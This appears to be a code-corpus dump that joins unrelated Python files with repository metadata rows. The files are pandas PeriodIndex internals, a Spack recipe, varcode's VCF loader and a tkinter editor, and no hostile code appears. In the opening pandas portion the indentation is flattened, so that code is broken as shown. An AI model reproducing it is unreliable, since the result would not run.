except TypeError:
pass
key = Period(key, self.freq).ordinal
return com._maybe_box(self, self._engine.get_value(s, key),
series, key)
@Appender(_index_shared_docs['get_indexer'] % _index_doc_kwargs)
def get_indexer(self, target, method=None, limit=None, tolerance=None):
target = _ensure_index(target)
if hasattr(target, 'freq') and target.freq != self.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, target.freqstr)
raise IncompatibleFrequency(msg)
if isinstance(target, PeriodIndex):
target = target.asi8
if tolerance is not None:
tolerance = self._convert_tolerance(tolerance, target)
return Index.get_indexer(self._int64index, target, method,
limit, tolerance)
def _get_unique_index(self, dropna=False):
"""
wrap Index._get_unique_index to handle NaT
"""
res = super(PeriodIndex, self)._get_unique_index(dropna=dropna)
if dropna:
res = res.dropna()
return res
def get_loc(self, key, method=None, tolerance=None):
"""
Get integer location for requested label
Returns
-------
loc : int
"""
try:
return self._engine.get_loc(key)
except KeyError:
if is_integer(key):
raise
try:
asdt, parsed, reso = parse_time_string(key, self.freq)
key = asdt
except TypeError:
pass
try:
key = Period(key, freq=self.freq)
except ValueError:
# we cannot construct the Period
# as we have an invalid type
raise KeyError(key)
try:
ordinal = tslib.iNaT if key is tslib.NaT else key.ordinal
if tolerance is not None:
tolerance = self._convert_tolerance(tolerance,
np.asarray(key))
return self._int64index.get_loc(ordinal, method, tolerance)
except KeyError:
raise KeyError(key)
def _maybe_cast_slice_bound(self, label, side, kind):
"""
If label is a string or a datetime, cast it to Period.ordinal according
to resolution.
Parameters
----------
label : object
side : {'left', 'right'}
kind : {'ix', 'loc', 'getitem'}
Returns
-------
bound : Period or object
Notes
-----
Value of `side` parameter should be validated in caller.
"""
assert kind in ['ix', 'loc', 'getitem']
if isinstance(label, datetime):
return Period(label, freq=self.freq)
elif isinstance(label, compat.string_types):
try:
_, parsed, reso = parse_time_string(label, self.freq)
bounds = self._parsed_string_to_bounds(reso, parsed)
return bounds[0 if side == 'left' else 1]
except Exception:
raise KeyError(label)
elif is_integer(label) or is_float(label):
self._invalid_indexer('slice', label)
return label
def _parsed_string_to_bounds(self, reso, parsed):
if reso == 'year':
t1 = Period(year=parsed.year, freq='A')
elif reso == 'month':
t1 = Period(year=parsed.year, month=parsed.month, freq='M')
elif reso == 'quarter':
q = (parsed.month - 1) // 3 + 1
t1 = Period(year=parsed.year, quarter=q, freq='Q-DEC')
elif reso == 'day':
t1 = Period(year=parsed.year, month=parsed.month, day=parsed.day,
freq='D')
elif reso == 'hour':
t1 = Period(year=parsed.year, month=parsed.month, day=parsed.day,
hour=parsed.hour, freq='H')
elif reso == 'minute':
t1 = Period(year=parsed.year, month=parsed.month, day=parsed.day,
hour=parsed.hour, minute=parsed.minute, freq='T')
elif reso == 'second':
t1 = Period(year=parsed.year, month=parsed.month, day=parsed.day,
hour=parsed.hour, minute=parsed.minute,
second=parsed.second, freq='S')
else:
raise KeyError(reso)
return (t1.asfreq(self.freq, how='start'),
t1.asfreq(self.freq, how='end'))
def _get_string_slice(self, key):
if not self.is_monotonic:
raise ValueError('Partial indexing only valid for '
'ordered time series')
key, parsed, reso = parse_time_string(key, self.freq)
grp = resolution.Resolution.get_freq_group(reso)
freqn = resolution.get_freq_group(self.freq)
if reso in ['day', 'hour', 'minute', 'second'] and not grp < freqn:
raise KeyError(key)
t1, t2 = self._parsed_string_to_bounds(reso, parsed)
return slice(self.searchsorted(t1.ordinal, side='left'),
self.searchsorted(t2.ordinal, side='right'))
def _convert_tolerance(self, tolerance, target):
tolerance = DatetimeIndexOpsMixin._convert_tolerance(self, tolerance,
target)
if target.size != tolerance.size and tolerance.size > 1:
raise ValueError('list-like tolerance size must match '
'target index size')
return self._maybe_convert_timedelta(tolerance)
def insert(self, loc, item):
if not isinstance(item, Period) or self.freq != item.freq:
return self.astype(object).insert(loc, item)
idx = np.concatenate((self[:loc].asi8, np.array([item.ordinal]),
self[loc:].asi8))
return self._shallow_copy(idx)
def join(self, other, how='left', level=None, return_indexers=False,
sort=False):
"""
See Index.join
"""
self._assert_can_do_setop(other)
result = Int64Index.join(self, other, how=how, level=level,
return_indexers=return_indexers,
sort=sort)
if return_indexers:
result, lidx, ridx = result
return self._apply_meta(result), lidx, ridx
return self._apply_meta(result)
def _assert_can_do_setop(self, other):
super(PeriodIndex, self)._assert_can_do_setop(other)
if not isinstance(other, PeriodIndex):
raise ValueError('can only call with other PeriodIndex-ed objects')
if self.freq != other.freq:
msg = _DIFFERENT_FREQ_INDEX.format(self.freqstr, other.freqstr)
raise IncompatibleFrequency(msg)
def _wrap_union_result(self, other, result):
name = self.name if self.name == other.name else None
result = self._apply_meta(result)
result.name = name
return result
def _apply_meta(self, rawarr):
if not isinstance(rawarr, PeriodIndex):
rawarr = PeriodIndex._from_ordinals(rawarr, freq=self.freq,
name=self.name)
return rawarr
def _format_native_types(self, na_rep=u('NaT'), date_format=None,
**kwargs):
values = self.astype(object).values
if date_format:
formatter = lambda dt: dt.strftime(date_format)
else:
formatter = lambda dt: u('%s') % dt
if self.hasnans:
mask = self._isnan
values[mask] = na_rep
imask = ~mask
values[imask] = np.array([formatter(dt) for dt
in values[imask]])
else:
values = np.array([formatter(dt) for dt in values])
return values
def __setstate__(self, state):
"""Necessary for making this object picklable"""
if isinstance(state, dict):
super(PeriodIndex, self).__setstate__(state)
elif isinstance(state, tuple):
# < 0.15 compat
if len(state) == 2:
nd_state, own_state = state
data = np.empty(nd_state[1], dtype=nd_state[2])
np.ndarray.__setstate__(data, nd_state)
# backcompat
self.freq = Period._maybe_convert_freq(own_state[1])
else: # pragma: no cover
data = np.empty(state)
np.ndarray.__setstate__(self, state)
self._data = data
else:
raise Exception("invalid pickle state")
_unpickle_compat = __setstate__
def tz_convert(self, tz):
"""
Convert tz-aware DatetimeIndex from one time zone to another (using
pytz/dateutil)
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone for time. Corresponding timestamps would be converted to
time zone of the TimeSeries.
None will remove timezone holding UTC time.
Returns
-------
normalized : DatetimeIndex
Notes
-----
Not currently implemented for PeriodIndex
"""
raise NotImplementedError("Not yet implemented for PeriodIndex")
def tz_localize(self, tz, ambiguous='raise'):
"""
Localize tz-naive DatetimeIndex to given time zone (using
pytz/dateutil), or remove timezone from tz-aware DatetimeIndex
Parameters
----------
tz : string, pytz.timezone, dateutil.tz.tzfile or None
Time zone for time. Corresponding timestamps would be converted to
time zone of the TimeSeries.
None will remove timezone holding local time.
Returns
-------
localized : DatetimeIndex
Notes
-----
Not currently implemented for PeriodIndex
"""
raise NotImplementedError("Not yet implemented for PeriodIndex")
PeriodIndex._add_comparison_methods()
PeriodIndex._add_numeric_methods_disabled()
PeriodIndex._add_logical_methods_disabled()
PeriodIndex._add_datetimelike_methods()
def _get_ordinal_range(start, end, periods, freq, mult=1):
if com._count_not_none(start, end, periods) != 2:
raise ValueError('Of the three parameters: start, end, and periods, '
'exactly two must be specified')
if freq is not None:
_, mult = _gfc(freq)
if start is not None:
start = Period(start, freq)
if end is not None:
end = Period(end, freq)
is_start_per = isinstance(start, Period)
is_end_per = isinstance(end, Period)
if is_start_per and is_end_per and start.freq != end.freq:
raise ValueError('start and end must have same freq')
if (start is tslib.NaT or end is tslib.NaT):
raise ValueError('start and end must not be NaT')
if freq is None:
if is_start_per:
freq = start.freq
elif is_end_per:
freq = end.freq
else: # pragma: no cover
raise ValueError('Could not infer freq from start/end')
if periods is not None:
periods = periods * mult
if start is None:
data = np.arange(end.ordinal - periods + mult,
end.ordinal + 1, mult,
dtype=np.int64)
else:
data = np.arange(start.ordinal, start.ordinal + periods, mult,
dtype=np.int64)
else:
data = np.arange(start.ordinal, end.ordinal + 1, mult, dtype=np.int64)
return data, freq
def _range_from_fields(year=None, month=None, quarter=None, day=None,
hour=None, minute=None, second=None, freq=None):
if hour is None:
hour = 0
if minute is None:
minute = 0
if second is None:
second = 0
if day is None:
day = 1
ordinals = []
if quarter is not None:
if freq is None:
freq = 'Q'
base = frequencies.FreqGroup.FR_QTR
else:
base, mult = _gfc(freq)
if base != frequencies.FreqGroup.FR_QTR:
raise AssertionError("base must equal FR_QTR")
year, quarter = _make_field_arrays(year, quarter)
for y, q in zip(year, quarter):
y, m = _quarter_to_myear(y, q, freq)
val = period.period_ordinal(y, m, 1, 1, 1, 1, 0, 0, base)
ordinals.append(val)
else:
base, mult = _gfc(freq)
arrays = _make_field_arrays(year, month, day, hour, minute, second)
for y, mth, d, h, mn, s in zip(*arrays):
ordinals.append(period.period_ordinal(
y, mth, d, h, mn, s, 0, 0, base))
return np.array(ordinals, dtype=np.int64), freq
def _make_field_arrays(*fields):
length = None
for x in fields:
if isinstance(x, (list, np.ndarray, ABCSeries)):
if length is not None and len(x) != length:
raise ValueError('Mismatched Period array lengths')
elif length is None:
length = len(x)
arrays = [np.asarray(x) if isinstance(x, (np.ndarray, list, ABCSeries))
else np.repeat(x, length) for x in fields]
return arrays
def pnow(freq=None):
# deprecation, xref #13790
warnings.warn("pd.pnow() and pandas.core.indexes.period.pnow() "
"are deprecated. Please use Period.now()",
FutureWarning, stacklevel=2)
return Period.now(freq=freq)
def period_range(start=None, end=None, periods=None, freq='D', name=None):
"""
Return a fixed frequency PeriodIndex, with day (calendar) as the default
frequency
Parameters
----------
start : string or period-like, default None
Left bound for generating periods
end : string or period-like, default None
Right bound for generating periods
periods : integer, default None
Number of periods to generate
freq : string or DateOffset, default 'D' (calendar daily)
Frequency alias
name : string, default None
Name of the resulting PeriodIndex
Notes
-----
Of the three parameters: ``start``, ``end``, and ``periods``, exactly two
must be specified.
To learn more about the frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
Returns
-------
prng : PeriodIndex
Examples
--------
>>> pd.period_range(start='2017-01-01', end='2018-01-01', freq='M')
PeriodIndex(['2017-01', '2017-02', '2017-03', '2017-04', '2017-05',
                 '2017-06', '2017-07', '2017-08', '2017-09', '2017-10',
                 '2017-11', '2017-12', '2018-01'],
dtype='period[M]', freq='M')
If ``start`` or ``end`` are ``Period`` objects, they will be used as anchor
endpoints for a ``PeriodIndex`` with frequency matching that of the
``period_range`` constructor.
>>> pd.period_range(start=pd.Period('2017Q1', freq='Q'),
... end=pd.Period('2017Q2', freq='Q'), freq='M')
PeriodIndex(['2017-03', '2017-04', '2017-05', '2017-06'],
dtype='period[M]', freq='M')
"""
if com._count_not_none(start, end, periods) != 2:
raise ValueError('Of the three parameters: start, end, and periods, '
'exactly two must be specified')
return PeriodIndex(start=start, end=end, periods=periods,
freq=freq, name=name)
| 34.462257 | 84 | 0.583213 |
4a224ece89facd012619a2773268fec5a79a92a7 | 223 | py | Python | scripts/run_docs.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 55 | 2019-02-28T23:58:42.000Z | 2020-07-14T22:01:45.000Z | scripts/run_docs.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 72 | 2019-04-04T18:46:30.000Z | 2020-06-24T02:47:57.000Z | scripts/run_docs.py | jmtaysom/idom | d2a569d27f915d3b2b1fc6eb8eef9aca3a6d9343 | [
"MIT"
] | 7 | 2019-04-02T17:53:30.000Z | 2020-06-23T16:17:58.000Z | import os
import sys
# all scripts should be run from the repository root so we need to insert cwd to path
# to import docs
sys.path.insert(0, os.getcwd())
if __name__ == "__main__":
from docs import run
run()
| 15.928571 | 85 | 0.699552 |
4a224edb492c51ccd21b3750224bbc772b1a912e | 747 | py | Python | core/fileparsers/stockidnamemapfile.py | vewe-richard/moneysea | c72bc8d4c973a9793849c38f620f4ca715e26b10 | [
"Apache-2.0"
] | null | null | null | core/fileparsers/stockidnamemapfile.py | vewe-richard/moneysea | c72bc8d4c973a9793849c38f620f4ca715e26b10 | [
"Apache-2.0"
] | null | null | null | core/fileparsers/stockidnamemapfile.py | vewe-richard/moneysea | c72bc8d4c973a9793849c38f620f4ca715e26b10 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
from baseparser import BaseParser
from config import Config
class StockIdNameMapFile(BaseParser):
def __init__(self, filepath):
BaseParser.__init__(self, filepath)
self._map = {}
pass
def doparse(self):
with open(self._filepath) as f:
for line in f:
for i in line.split(")"):
items = i.split("(")
if len(items) != 2:
continue
self._map[int(items[1].strip())] = items[0].strip()
pass
    def verify(self):
return False
if __name__ == "__main__":
smf = StockIdNameMapFile(Config.STOCK_ID_NAME_MAP_SHA)
smf.doparse()
print smf._map[600505]
pass
| 24.096774 | 71 | 0.551539 |
4a224f6998f945cb15486608b7627b542f6ce82b | 1,354 | py | Python | var/spack/repos/builtin/packages/apfel/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2,360 | 2017-11-06T08:47:01.000Z | 2022-03-31T14:45:33.000Z | var/spack/repos/builtin/packages/apfel/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 13,838 | 2017-11-04T07:49:45.000Z | 2022-03-31T23:38:39.000Z | var/spack/repos/builtin/packages/apfel/package.py | LiamBindle/spack | e90d5ad6cfff2ba3de7b537d6511adccd9d5fcf1 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1,793 | 2017-11-04T07:45:50.000Z | 2022-03-30T14:31:53.000Z | # Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Apfel(AutotoolsPackage):
"""APFEL is a library able to perform DGLAP evolution up to NNLO in QCD and
to NLO in QED, both with pole and MSbar masses. The coupled DGLAP
QCD+QED evolution equations are solved in x-space by means of higher
order interpolations and Runge-Kutta techniques."""
homepage = "https://github.com/scarrazza/apfel"
url = "https://github.com/scarrazza/apfel/archive/3.0.4.tar.gz"
tags = ['hep']
version('3.0.4', sha256='c7bfae7fe2dc0185981850f2fe6ae4842749339d064c25bf525b4ef412bbb224')
depends_on('swig', when='+python')
depends_on('python', when='+python', type=('build', 'run'))
depends_on('lhapdf', when='+lhapdf', type=('build', 'run'))
variant('python', description='Build python wrapper', default=False)
variant('lhapdf', description='Link to LHAPDF', default=False)
def configure_args(self):
args = []
if self.spec.satisfies('~python'):
args.append('--disable-pywrap')
else:
args.append('--enable-pywrap')
args += self.enable_or_disable('lhapdf')
return args
| 35.631579 | 95 | 0.674298 |
4a225007f34592685ca413e49a1138f533fcf479 | 17,660 | py | Python | varcode/vcf.py | carnivorouspeanut/varcode_comp | 4181a3eceeaa76fc47f877ddd15fc188133911f9 | [
"Apache-2.0"
] | 2 | 2021-05-24T12:33:13.000Z | 2022-02-28T04:39:53.000Z | varcode/vcf.py | carnivorouspeanut/varcode_comp | 4181a3eceeaa76fc47f877ddd15fc188133911f9 | [
"Apache-2.0"
] | null | null | null | varcode/vcf.py | carnivorouspeanut/varcode_comp | 4181a3eceeaa76fc47f877ddd15fc188133911f9 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function, division
import os
import requests
import zlib
import logging
from collections import OrderedDict
from warnings import warn
from six.moves import urllib
import pandas
from typechecks import require_string
import vcf as pyvcf
from .reference import infer_genome
from .variant import Variant, variant_ascending_position_sort_key
from .variant_collection import VariantCollection
logger = logging.getLogger(__name__)
def load_vcf(
path,
genome=None,
reference_vcf_key="reference",
only_passing=True,
allow_extended_nucleotides=False,
include_info=True,
chunk_size=10 ** 5,
max_variants=None,
sort_key=variant_ascending_position_sort_key,
distinct=True):
"""
Load reference name and Variant objects from the given VCF filename.
    This is the fast pandas-based implementation (formerly `load_vcf_fast`).
    It is typically about 2X faster than the previous implementation, and with
    `include_info=False`, about 4X faster. If most of the records in the VCF
    have failed filters (and only_passing=True), it can be orders of magnitude
    faster.
    Only local files are parsed directly; when given an HTTP/HTTPS/FTP URL the
    file is first downloaded to a temporary local path and loaded from there.
Parameters
----------
path : str
Path to VCF (*.vcf) or compressed VCF (*.vcf.gz).
genome : {pyensembl.Genome, reference name, Ensembl version int}, optional
Optionally pass in a PyEnsembl Genome object, name of reference, or
PyEnsembl release version to specify the reference associated with a
VCF (otherwise infer reference from VCF using reference_vcf_key)
reference_vcf_key : str, optional
Name of metadata field which contains path to reference FASTA
file (default = 'reference')
only_passing : boolean, optional
If true, any entries whose FILTER field is not one of "." or "PASS" is
dropped.
allow_extended_nucleotides : boolean, default False
Allow characters other that A,C,T,G in the ref and alt strings.
include_info : boolean, default True
Whether to parse the INFO and per-sample columns. If you don't need
these, set to False for faster parsing.
chunk_size: int, optional
Number of records to load in memory at once.
max_variants : int, optional
If specified, return only the first max_variants variants.
sort_key : fn
Function which maps each element to a sorting criterion.
Set to None to not to sort the variants.
distinct : boolean, default True
Don't keep repeated variants
"""
require_string(path, "Path or URL to VCF")
parsed_path = parse_url_or_path(path)
if parsed_path.scheme and parsed_path.scheme.lower() != "file":
# pandas.read_table nominally supports HTTP, but it tends to crash on
# large files and does not support gzip. Switching to the python-based
# implementation of read_table (with engine="python") helps with some
# issues but introduces a new set of problems (e.g. the dtype parameter
# is not accepted). For these reasons, we're currently not attempting
# to load VCFs over HTTP with pandas directly, and instead download it
# to a temporary file and open that.
(filename, headers) = urllib.request.urlretrieve(path)
try:
# The downloaded file has no file extension, which confuses pyvcf
# for gziped files in Python 3. We rename it to have the correct
# file extension.
new_filename = "%s.%s" % (
filename, parsed_path.path.split(".")[-1])
os.rename(filename, new_filename)
filename = new_filename
return load_vcf(
filename,
genome=genome,
reference_vcf_key=reference_vcf_key,
only_passing=only_passing,
allow_extended_nucleotides=allow_extended_nucleotides,
include_info=include_info,
chunk_size=chunk_size,
max_variants=max_variants,
sort_key=sort_key,
distinct=distinct)
finally:
logger.info("Removing temporary file: %s", filename)
os.unlink(filename)
# Loading a local file.
# The file will be opened twice: first to parse the header with pyvcf, then
# by pandas to read the data.
# PyVCF reads the metadata immediately and stops at the first line with
# data. We can close the file after that.
handle = PyVCFReaderFromPathOrURL(path)
handle.close()
genome = infer_genome_from_vcf(
genome,
handle.vcf_reader,
reference_vcf_key)
df_iterator = read_vcf_into_dataframe(
path,
include_info=include_info,
sample_names=handle.vcf_reader.samples if include_info else None,
chunk_size=chunk_size)
if include_info:
def sample_info_parser(unparsed_sample_info_strings, format_string):
"""
Given a format string like "GT:AD:ADP:DP:FS"
and a list of sample info strings where each entry is like
"0/1:3,22:T=3,G=22:25:33", return a dict that maps:
sample name -> field name -> value. Uses pyvcf to parse the fields.
"""
return pyvcf_calls_to_sample_info_list(
handle.vcf_reader._parse_samples(
unparsed_sample_info_strings, format_string, None))
else:
sample_info_parser = None
return dataframes_to_variant_collection(
df_iterator,
source_path=path,
info_parser=handle.vcf_reader._parse_info if include_info else None,
only_passing=only_passing,
max_variants=max_variants,
sample_names=handle.vcf_reader.samples if include_info else None,
sample_info_parser=sample_info_parser,
variant_kwargs={
'ensembl': genome,
'allow_extended_nucleotides': allow_extended_nucleotides},
variant_collection_kwargs={
'sort_key': sort_key,
'distinct': distinct})
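# Added illustrative usage sketch (not part of the original module). The file
# path and genome name below are assumptions chosen for the example.
# >>> variants = load_vcf("/path/to/somatic.vcf", genome="GRCh37")
# >>> len(variants)   # number of Variant objects parsed from the file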
def load_vcf_fast(*args, **kwargs):
"""
Same as load_vcf, keeping this name for backwards compatibility.
"""
warn(
"load_vcf_fast is deprecated and has been renamed to load_vcf",
DeprecationWarning)
return load_vcf(*args, **kwargs)
def pyvcf_calls_to_sample_info_list(calls):
"""
Given pyvcf.model._Call instances, return a dict mapping each sample
name to its per-sample info:
sample name -> field -> value
"""
return OrderedDict(
(call.sample, call.data._asdict()) for call in calls)
def dataframes_to_variant_collection(
dataframes,
source_path,
info_parser=None,
only_passing=True,
max_variants=None,
sample_names=None,
sample_info_parser=None,
variant_kwargs={},
variant_collection_kwargs={}):
"""
Load a VariantCollection from an iterable of pandas dataframes.
This takes an iterable of dataframes instead of a single dataframe to avoid
having to load huge dataframes at once into memory. If you have a single
dataframe, just pass it in a single-element list.
Parameters
----------
dataframes
Iterable of dataframes (e.g. a generator). Expected columns are:
["CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER"]
and 'INFO' if `info_parser` is not Null. Columns must be in this
order.
source_path : str
Path of VCF file from which DataFrame chunks were generated.
info_parser : string -> object, optional
Callable to parse INFO strings.
only_passing : boolean, optional
If true, any entries whose FILTER field is not one of "." or "PASS" is
dropped.
max_variants : int, optional
If specified, return only the first max_variants variants.
sample_names : list of strings, optional
Sample names. The final columns of the dataframe should match these.
If specified, the per-sample info columns will be parsed. You must
also specify sample_info_parser.
sample_info_parser : string list * string -> dict, optional
Callable to parse per-sample info columns.
variant_kwargs : dict, optional
Additional keyword paramters to pass to Variant.__init__
variant_collection_kwargs : dict, optional
Additional keyword parameters to pass to VariantCollection.__init__.
"""
expected_columns = (
["CHROM", "POS", "ID", "REF", "ALT", "QUAL", "FILTER"] +
(["INFO"] if info_parser else []))
if info_parser and sample_names:
if sample_info_parser is None:
raise TypeError(
"Must specify sample_info_parser if specifying sample_names")
expected_columns.append("FORMAT")
expected_columns.extend(sample_names)
variants = []
metadata = {}
try:
for chunk in dataframes:
assert chunk.columns.tolist() == expected_columns,\
"dataframe columns (%s) do not match expected columns (%s)" % (
chunk.columns, expected_columns)
for tpl in chunk.itertuples():
(i, chrom, pos, id_, ref, alts, qual, flter) = tpl[:8]
if flter == ".":
flter = None
elif flter == "PASS":
flter = []
elif only_passing:
continue
else:
flter = flter.split(';')
if id_ == ".":
id_ = None
qual = float(qual) if qual != "." else None
alt_num = 0
info = sample_info = None
for alt in alts.split(","):
if alt != ".":
if info_parser is not None and info is None:
info = info_parser(tpl[8]) # INFO column
if sample_names:
# Sample name -> field -> value dict.
sample_info = sample_info_parser(
list(tpl[10:]), # sample info columns
tpl[9], # FORMAT column
)
variant = Variant(
chrom,
int(pos), # want a Python int not numpy.int64
ref,
alt,
**variant_kwargs)
variants.append(variant)
metadata[variant] = {
'id': id_,
'qual': qual,
'filter': flter,
'info': info,
'sample_info': sample_info,
'alt_allele_index': alt_num,
}
if max_variants and len(variants) > max_variants:
raise StopIteration
alt_num += 1
except StopIteration:
pass
return VariantCollection(
variants=variants,
source_to_metadata_dict={source_path: metadata},
**variant_collection_kwargs)
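# Added illustrative sketch (not original source): a single pre-loaded
# DataFrame can be passed as a one-element list, as described in the docstring
# above. The DataFrame name and source path are assumptions for the example.
# >>> vc = dataframes_to_variant_collection(
# ...     [df], source_path="example.vcf", info_parser=None)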
def read_vcf_into_dataframe(
path,
include_info=False,
sample_names=None,
chunk_size=None):
"""
Load the data of a VCF into a pandas dataframe. All headers are ignored.
Parameters
----------
path : str
Path to local file. HTTP and other protocols are not implemented.
include_info : boolean, default False
If true, the INFO field is not parsed, but is included as a string in
the resulting data frame. If false, the INFO field is omitted.
sample_names: string list, optional
Sample names. The final columns of the dataframe should match these.
If specified (and include_info is also specified), the FORMAT and
per-sample info columns will be included in the result dataframe.
chunk_size : int, optional
If buffering is desired, the number of rows per chunk.
Returns
---------
If chunk_size is None (the default), a dataframe with the contents of the
VCF file. Otherwise, an iterable of dataframes, each with chunk_size rows.
"""
vcf_field_types = OrderedDict()
vcf_field_types['CHROM'] = str
vcf_field_types['POS'] = int
vcf_field_types['ID'] = str
vcf_field_types['REF'] = str
vcf_field_types['ALT'] = str
vcf_field_types['QUAL'] = str
vcf_field_types['FILTER'] = str
if include_info:
vcf_field_types['INFO'] = str
if sample_names:
vcf_field_types['FORMAT'] = str
for name in sample_names:
vcf_field_types[name] = str
parsed_path = parse_url_or_path(path)
if not parsed_path.scheme or parsed_path.scheme.lower() == "file":
path = parsed_path.path
else:
raise NotImplementedError("Only local files are supported.")
compression = None
if path.endswith(".gz"):
compression = "gzip"
elif path.endswith(".bz2"):
compression = "bz2"
reader = pandas.read_table(
path,
compression=compression,
comment="#",
chunksize=chunk_size,
dtype=vcf_field_types,
names=list(vcf_field_types),
usecols=range(len(vcf_field_types)))
return reader
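# Added illustrative sketch (not original source): when chunk_size is given,
# pandas returns an iterator of DataFrame chunks rather than one DataFrame.
# The path below is an assumption for the example.
# >>> for chunk in read_vcf_into_dataframe("variants.vcf", chunk_size=10 ** 5):
# ...     do_something(chunk)  # hypothetical per-chunk processing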
class PyVCFReaderFromPathOrURL(object):
"""
Thin wrapper over a PyVCF Reader object that supports loading over URLs,
    and a close() function (pyvcf somehow doesn't have a close() function).
Attributes
----------
path : string or None
path that was loaded, if available.
vcf_reader : pyvcf Reader instance
"""
def __init__(self, path):
"""
Construct a new wrapper.
Parameters
----------
path : string or pyvcf Reader instance
Path or URL to load, or Reader instance.
"""
self.path = None # string path, if available.
self.vcf_reader = None # vcf_reader. Will always be set.
self._to_close = None # object to call close() on when we're done.
if isinstance(path, pyvcf.Reader):
self.vcf_reader = path
else:
require_string(path, "Path or URL to VCF")
self.path = path
parsed_path = parse_url_or_path(path)
if not parsed_path.scheme or parsed_path.scheme.lower() == 'file':
self.vcf_reader = pyvcf.Reader(
filename=parsed_path.path,
strict_whitespace=True)
elif parsed_path.scheme.lower() in ("http", "https", "ftp"):
self._to_close = response = requests.get(path, stream=True)
response.raise_for_status() # raise error on 404, etc.
if path.endswith(".gz"):
lines = stream_gzip_decompress_lines(
response.iter_content())
else:
lines = response.iter_lines(decode_unicode=True)
self.vcf_reader = pyvcf.Reader(
fsock=lines,
compressed=False,
strict_whitespace=True)
else:
raise ValueError("Unsupported scheme: %s" % parsed_path.scheme)
def close(self):
if self._to_close is not None:
self._to_close.close()
def stream_gzip_decompress_lines(stream):
"""
Uncompress a gzip stream into lines of text.
Parameters
----------
Generator of chunks of gzip compressed text.
Returns
-------
Generator of uncompressed lines.
"""
dec = zlib.decompressobj(zlib.MAX_WBITS | 16)
previous = ""
for compressed_chunk in stream:
chunk = dec.decompress(compressed_chunk).decode()
if chunk:
lines = (previous + chunk).split("\n")
previous = lines.pop()
for line in lines:
yield line
yield previous
def infer_genome_from_vcf(genome, vcf_reader, reference_vcf_key):
"""
Helper function to make a pyensembl.Genome instance.
"""
if genome:
return infer_genome(genome)
elif reference_vcf_key not in vcf_reader.metadata:
raise ValueError("Unable to infer reference genome for %s" % (
vcf_reader.filename,))
else:
reference_path = vcf_reader.metadata[reference_vcf_key]
return infer_genome(reference_path)
def parse_url_or_path(s):
# urlparse will parse paths with two leading slashes (e.g. "//foo")
# in a strange way. We collapse these paths to start with just one
# slash.
if s.startswith("//"):
s = "/" + s.lstrip("/")
return urllib.parse.urlparse(s)
| 35.604839 | 79 | 0.611268 |
4a2250b698c50b645fb80d2a694a0b983bc706a9 | 4,367 | py | Python | 19_gui_development_tkinter/lectures/17_adding_permanent_scrollbar/app.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 29 | 2019-09-02T21:15:59.000Z | 2022-01-14T02:20:05.000Z | 19_gui_development_tkinter/lectures/17_adding_permanent_scrollbar/app.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 2 | 2020-08-20T05:48:36.000Z | 2021-06-02T03:16:31.000Z | 19_gui_development_tkinter/lectures/17_adding_permanent_scrollbar/app.py | gdia/The-Complete-Python-Course | ed375b65242249bc749c3e292a6149f8528b9dcf | [
"MIT"
] | 38 | 2019-10-20T14:29:12.000Z | 2022-03-27T19:50:05.000Z | import tkinter as tk
from tkinter import ttk, filedialog, messagebox
text_contents = dict()
def check_for_changes():
current = get_text_widget()
content = current.get("1.0", "end-1c")
name = notebook.tab("current")["text"]
if hash(content) != text_contents[str(current)]:
if name[-1] != "*":
notebook.tab("current", text=name + "*")
elif name[-1] == "*":
notebook.tab("current", text=name[:-1])
def get_text_widget():
current_tab = notebook.nametowidget(notebook.select())
text_widget = current_tab.winfo_children()[0]
return text_widget
def close_current_tab():
current = get_text_widget()
if current_tab_unsaved() and not confirm_close():
return
if len(notebook.tabs()) == 1:
create_file()
notebook.forget(current)
def current_tab_unsaved():
text_widget = get_text_widget()
content = text_widget.get("1.0", "end-1c")
return hash(content) != text_contents[str(text_widget)]
def confirm_close():
return messagebox.askyesno(
message="You have unsaved changes. Are you sure you want to close?",
icon="question",
title="Unsaved changes",
)
def confirm_quit():
unsaved = False
for tab in notebook.tabs():
tab_widget = root.nametowidget(tab)
text_widget = tab_widget.winfo_children()[0]
content = text_widget.get("1.0", "end-1c")
if hash(content) != text_contents[str(text_widget)]:
unsaved = True
break
if unsaved and not confirm_close():
return
root.destroy()
def create_file(content="", title="Untitled"):
container = ttk.Frame(notebook)
container.pack()
text_area = tk.Text(container)
text_area.insert("end", content)
text_area.pack(side="left", fill="both", expand=True)
notebook.add(container, text=title)
notebook.select(container)
text_contents[str(text_area)] = hash(content)
text_scroll = ttk.Scrollbar(container, orient="vertical", command=text_area.yview)
text_scroll.pack(side="right", fill="y")
text_area["yscrollcommand"] = text_scroll.set
def open_file():
file_path = filedialog.askopenfilename()
try:
filename = file_path.split("/")[-1]
with open(file_path, "r") as file:
content = file.read()
except (AttributeError, FileNotFoundError):
